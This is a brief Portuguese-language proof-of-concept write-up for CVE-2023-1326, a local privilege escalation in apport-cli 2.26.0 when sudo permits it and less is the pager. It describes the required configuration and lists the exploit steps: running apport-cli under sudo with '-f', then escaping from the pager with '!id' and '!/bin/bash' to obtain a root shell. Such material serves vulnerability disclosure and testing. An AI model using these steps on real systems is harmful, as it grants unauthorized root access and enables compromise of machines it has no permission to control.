
Exploit de prova de conceito para CVE-2023-1326, uma vulnerabilidade de escalonamento de privilégios no apport-cli 2.26.0 quando configurado com sudo e less como paginador.
Uma prova de conceito para CVE-2023–1326 em apport-cli 2.26.0
Esta vulnerabilidade é uma escalada de privilégio no apport-cli 2.26.0, semelhante ao CVE-2023–26604, esta vulnerabilidade só funciona se estiver atribuída no sudoers:

Um ataque de escalada de privilégio foi encontrado no apport-cli 2.26.0 e anteriores, semelhante ao CVE-2023-26604. Se um sistema estiver especialmente configurado para permitir que utilizadores não privilegiados executem sudo apport-cli, less estiver configurado como paginador, e o tamanho do terminal puder ser definido: um atacante local pode escalar privilégios.
sudo /usr/bin/apport-cli -f



!id
!/bin/bash
